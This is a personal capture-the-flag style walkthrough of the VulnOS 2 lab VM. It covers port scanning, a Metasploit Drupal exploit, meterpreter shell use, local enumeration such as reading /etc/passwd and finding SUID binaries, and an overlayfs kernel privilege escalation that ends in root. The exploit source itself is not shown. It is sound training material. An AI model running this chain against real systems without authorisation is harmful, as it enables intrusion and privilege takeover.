Contents

1

Vuln OS 2

Continuing on my list of VM’s from the start of this all, VulnOS 2! I skipped 1 for some reason.

nmap:

$ nmap 192.168.2.17                
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-04 19:35 EST
Nmap scan report for 192.168.2.17
Host is up (0.00062s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6667/tcp open  irc

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

$ curl 192.168.2.17     
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>VulnOSv2</title>
</head>

<body bgcolor="#000000" text="#FFFFFF" link="#FF0000">
<div align="center">
  <h3>##########<strong>############### Welcome to VulnOSv2 #########################
  </strong></h3>
  <h4>&nbsp;</h4>
  <h4>### VulnOS are a series of vulnerable operating systems packed as virtual images to enhance penetration testing skills ###</h4>
  <h4>This is a vulnerable server. DO NOT USE this VM in a production environment !</h4>
  <h4>&nbsp;</h4>
  <p>&nbsp;</p>
  <h3>&nbsp; </h3>
  <h3>&nbsp;</h3>
  <h4>### Pentest the company <a href="/jabc" title="JABC" target="new">website</a> on the server... Get root of the system and read the final flag ###</h4>
</div>
</body>
</html>

Run Nikto:

$ nikto --host 192.168.2.17
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.17
+ Target Hostname:    192.168.2.17
+ Target Port:        80
+ Start Time:         2021-01-04 19:36:11 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 3c9, size: 531f36393d540, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2021-01-04 19:36:58 (GMT-5) (47 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

And navigating to the url in a browser to poke around as a user for a while…
2

The pages are changed with a URL parameter:
- http://192.168.2.17/jabc/?q=node/1
- http://192.168.2.17/jabc/?q=node/2

and so on… I did find that there’s a little cart implementation:
3

The request headers for root server:
4

I notice Drupal, let’s check exploit db:
5

Let’s just give the metasploit module a shot!
6

Holy shit I’ve never actually gotten a meterpreter session before so I don’t even know how to use it! I ran help and started trying some commands out:

meterpreter > sysinfo
Computer    : VulnOSv2
OS          : Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686
Meterpreter : php/linux

meterpreter > shell
Process 1429 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

python --version 
Python 2.7.6

# Get a bash shell
python -c 'import pty;pty.spawn("/bin/bash")'

[email protected]:/var/www/html/jabc$
[email protected]:/var/www/html/jabc$ ls -al
ls -al
total 84
drwxrwxrwx  9 root root  4096 Apr 16  2016 .
drwxrwxrwx  4 root root  4096 May  3  2016 ..
lrwxrwxrwx  1 root root    22 Apr 16  2016 .htaccess -> /etc/drupal/7/htaccess
-rwxrwxrwx  1 root root  6604 Apr 16  2016 authorize.php
-rwxrwxrwx  1 root root   720 Apr 16  2016 cron.php
drwxrwxrwx  4 root root  4096 Apr 16  2016 includes
-rwxrwxrwx  1 root root   529 Apr 16  2016 index.php
-rwxrwxrwx  1 root root   703 Apr 16  2016 install.php
drwxrwxrwx  4 root root  4096 Apr 16  2016 misc
drwxrwxrwx 42 root root  4096 Apr 16  2016 modules
drwxrwxrwx  5 root root  4096 Apr 16  2016 profiles
-rwxrwxrwx  1 root root  1561 Apr 16  2016 robots.txt
drwxrwxrwx  2 root root  4096 Apr 16  2016 scripts
lrwxrwxrwx  1 root root    19 Apr 16  2016 sites -> /etc/drupal/7/sites
drwxrwxrwx  2 root root  4096 Apr 16  2016 templates
drwxrwxrwx  7 root root  4096 Apr 16  2016 themes
-rwxrwxrwx  1 root root 19986 Apr 16  2016 update.php
-rwxrwxrwx  1 root root   417 Apr 16  2016 xmlrpc.php

I poked around the Drupal install for a while because I’m not familiar with it, but haven’t found anything really useful…

Poking some more:

$ cd /home && find . -readable
cd /home && find . -readable
.
find: `./webmin': Permission denied
find: `./vulnosadmin': Permission denied

[email protected]:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash
mysql:x:104:113:MySQL Server,,,:/nonexistent:/bin/false
webmin:x:1001:1001::/home/webmin:
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
postfix:x:106:114::/var/spool/postfix:/bin/false
postgres:x:107:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

[email protected]:/home$ ps -aux | grep root
ps -aux | grep root
root         1  0.0  0.2   4328  2296 ?        Ss   01:33   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    01:33   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    01:33   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   01:33   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        R    01:33   0:00 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    01:33   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    01:33   0:00 [migration/0]
root        10  0.0  0.0      0     0 ?        S    01:33   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S<   01:33   0:00 [khelper]
root        12  0.0  0.0      0     0 ?        S    01:33   0:00 [kdevtmpfs]
root        13  0.0  0.0      0     0 ?        S<   01:33   0:00 [netns]
root        14  0.0  0.0      0     0 ?        S<   01:33   0:00 [writeback]
root        15  0.0  0.0      0     0 ?        S<   01:33   0:00 [kintegrityd]
root        16  0.0  0.0      0     0 ?        S<   01:33   0:00 [bioset]
root        17  0.0  0.0      0     0 ?        S<   01:33   0:00 [kworker/u3:0]
root        18  0.0  0.0      0     0 ?        S<   01:33   0:00 [kblockd]
root        19  0.0  0.0      0     0 ?        S<   01:33   0:00 [ata_sff]
root        20  0.0  0.0      0     0 ?        S    01:33   0:00 [khubd]
root        21  0.0  0.0      0     0 ?        S<   01:33   0:00 [md]
root        22  0.0  0.0      0     0 ?        S<   01:33   0:00 [devfreq_wq]
root        23  0.0  0.0      0     0 ?        R    01:33   0:00 [kworker/0:1]
root        25  0.0  0.0      0     0 ?        S    01:33   0:00 [khungtaskd]
root        26  0.0  0.0      0     0 ?        S    01:33   0:00 [kswapd0]
root        27  0.0  0.0      0     0 ?        SN   01:33   0:00 [ksmd]
root        28  0.0  0.0      0     0 ?        SN   01:33   0:00 [khugepaged]
root        29  0.0  0.0      0     0 ?        S    01:33   0:00 [fsnotify_mark]
root        30  0.0  0.0      0     0 ?        S    01:33   0:00 [ecryptfs-kthrea]
root        31  0.0  0.0      0     0 ?        S<   01:33   0:00 [crypto]
root        43  0.0  0.0      0     0 ?        S<   01:33   0:00 [kthrotld]
root        46  0.0  0.0      0     0 ?        S    01:33   0:00 [scsi_eh_0]
root        47  0.0  0.0      0     0 ?        S    01:33   0:00 [scsi_eh_1]
root        48  0.0  0.0      0     0 ?        S    01:33   0:00 [kworker/u2:2]
root        69  0.0  0.0      0     0 ?        S<   01:33   0:00 [deferwq]
root        70  0.0  0.0      0     0 ?        S<   01:33   0:00 [charger_manager]
root       120  0.0  0.0      0     0 ?        S<   01:33   0:00 [kpsmoused]
root       121  0.0  0.0      0     0 ?        S    01:33   0:00 [kworker/0:2]
root       122  0.0  0.0      0     0 ?        S    01:33   0:00 [scsi_eh_2]
root       123  0.0  0.0      0     0 ?        S<   01:33   0:00 [kworker/u3:1]
root       130  0.0  0.0      0     0 ?        S<   01:33   0:00 [kdmflush]
root       131  0.0  0.0      0     0 ?        S<   01:33   0:00 [bioset]
root       133  0.0  0.0      0     0 ?        S<   01:33   0:00 [kdmflush]
root       136  0.0  0.0      0     0 ?        S<   01:33   0:00 [bioset]
root       151  0.0  0.0      0     0 ?        S    01:33   0:00 [jbd2/dm-0-8]
root       152  0.0  0.0      0     0 ?        S<   01:33   0:00 [ext4-rsv-conver]
root       305  0.0  0.0      0     0 ?        S<   01:33   0:00 [ext4-rsv-conver]
root       394  0.0  0.0   3008   616 ?        S    01:33   0:00 upstart-udev-bridge --daemon
root       398  0.0  0.1  12148  1524 ?        Ss   01:33   0:00 /lib/systemd/systemd-udevd --daemon
root       464  0.0  0.1   3976  1456 ?        Ss   01:33   0:00 /lib/systemd/systemd-logind
root       496  0.0  0.0   3004   760 ?        S    01:33   0:00 upstart-file-bridge --daemon
root       615  0.0  0.0   2868   600 ?        S    01:33   0:00 upstart-socket-bridge --daemon
root       757  0.0  0.2   5512  1864 ?        Ss   01:34   0:00 dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root       930  0.0  0.1   4644   820 tty4     Ss+  01:34   0:00 /sbin/getty -8 38400 tty4
root       933  0.0  0.1   4644   820 tty5     Ss+  01:34   0:00 /sbin/getty -8 38400 tty5
root       938  0.0  0.1   4644   820 tty2     Ss+  01:34   0:00 /sbin/getty -8 38400 tty2
root       939  0.0  0.1   4644   828 tty3     Ss+  01:34   0:00 /sbin/getty -8 38400 tty3
root       942  0.0  0.1   4644   828 tty6     Ss+  01:34   0:00 /sbin/getty -8 38400 tty6
root       975  0.0  0.3   7808  2512 ?        Ss   01:34   0:00 /usr/sbin/sshd -D
root       979  0.0  0.1   3052   888 ?        Ss   01:34   0:00 cron
root       981  0.0  0.0   2192   608 ?        Ss   01:34   0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root      1315  0.0  1.9 115800 15040 ?        Ss   01:34   0:00 /usr/sbin/apache2 -k start
root      1348  0.0  0.1   4644   828 tty1     Ss+  01:34   0:00 /sbin/getty -8 38400 tty1
root      1388  0.0  0.0      0     0 ?        S    01:39   0:00 [kauditd]
root      1403  0.0  0.0      0     0 ?        S    01:39   0:00 [kworker/u2:0]
www-data  1487  0.0  0.0   2600   572 pts/0    S+   02:08   0:00 grep root

[email protected]:/home$ ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/
< -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/                  
/tmp:
.  ..

/var/backups:
.  ..

/var/mail/:
.  ..

/var/spool/mail/:
.  ..

/var/tmp:
.  ..

[email protected]:/home$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/fusermount
/bin/su
/bin/ping6
/bin/umount
/bin/ping
/bin/mount
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/mtr
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/sudo
/usr/lib/pt_chown
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/sbin/uuidd
/usr/sbin/pppd

[email protected]:/var/www/html/jabc$ ls -al /etc/cron* /etc/at*
ls -al /etc/cron* /etc/at*
-rw-r----- 1 root daemon  144 Oct 21  2013 /etc/at.deny
-rw-r--r-- 1 root root    722 Feb  9  2013 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x   2 root root 4096 Apr 16  2016 .
drwxr-xr-x 102 root root 4096 Jan  5 01:33 ..
-rw-r--r--   1 root root  102 Feb  9  2013 .placeholder
-rw-r--r--   1 root root  124 Oct 16  2014 drupal7
-rw-r--r--   1 root root  510 Oct 28  2015 php5

/etc/cron.daily:
total 80
drwxr-xr-x   2 root root  4096 Apr 16  2016 .
drwxr-xr-x 102 root root  4096 Jan  5 01:33 ..
-rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
-rwxr-xr-x   1 root root   625 Jan 14  2016 apache2
-rwxr-xr-x   1 root root   376 Apr  4  2014 apport
-rwxr-xr-x   1 root root 15481 Apr 10  2014 apt
-rwxr-xr-x   1 root root   314 Feb 18  2014 aptitude
-rwxr-xr-x   1 root root   355 Jun  4  2013 bsdmainutils
-rwxr-xr-x   1 root root   256 Mar  7  2014 dpkg
-rwxr-xr-x   1 root root   372 Jan 22  2014 logrotate
-rwxr-xr-x   1 root root  1261 Apr 10  2014 man-db
-rwxr-xr-x   1 root root   435 Jun 20  2013 mlocate
-rwxr-xr-x   1 root root   249 Feb 17  2014 passwd
-rwxr-xr-x   1 root root  2417 May 13  2013 popularity-contest
-rwxr-xr-x   1 root root   383 Mar  3  2016 samba
-rwxr-xr-x   1 root root   214 Apr 10  2014 update-notifier-common
-rwxr-xr-x   1 root root   328 Jul 18  2014 upstart

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 Apr  3  2016 .
drwxr-xr-x 102 root root 4096 Jan  5 01:33 ..
-rw-r--r--   1 root root  102 Feb  9  2013 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x   2 root root 4096 Apr  3  2016 .
drwxr-xr-x 102 root root 4096 Jan  5 01:33 ..
-rw-r--r--   1 root root  102 Feb  9  2013 .placeholder

/etc/cron.weekly:
total 28
drwxr-xr-x   2 root root 4096 Apr  3  2016 .
drwxr-xr-x 102 root root 4096 Jan  5 01:33 ..
-rw-r--r--   1 root root  102 Feb  9  2013 .placeholder
-rwxr-xr-x   1 root root  730 Feb 23  2014 apt-xapian-index
-rwxr-xr-x   1 root root  427 Apr 16  2014 fstrim
-rwxr-xr-x   1 root root  771 Apr 10  2014 man-db
-rwxr-xr-x   1 root root  211 Apr 10  2014 update-notifier-common

Okay nothing quick and simple that I can see… can we do a kernel exploit?

[email protected]:/$ uname -a
uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux

Oh yeah that’s pretty old…

$ searchsploit 3.13.0
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation 

# Back on remote host
[email protected]:/$ which gcc
which gcc
/usr/bin/gcc

# Okay, let's drop this into /tmp and give it a go!
meterpreter > edit /tmp/x.c
meterpreter > shell
Process 1612 created.
Channel 4 created.
python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/var/www/html/jabc$ ls
ls
authorize.php  index.php    modules     scripts    themes
cron.php       install.php  profiles    sites      update.php
includes       misc         robots.txt  templates  xmlrpc.php
[email protected]:/var/www/html/jabc$ cd /tmp
cd /tmp
[email protected]:/tmp$ ls
ls
vBDtEZi  x.c
[email protected]:/tmp$ gcc x.c -o x
gcc x.c -o x
[email protected]:/tmp$ ./x
./x
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

We win! Let’s find the flag:

# cd /root
$ cd /root
# cat flag.txt
$ cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?
Directory
$ cd content && tree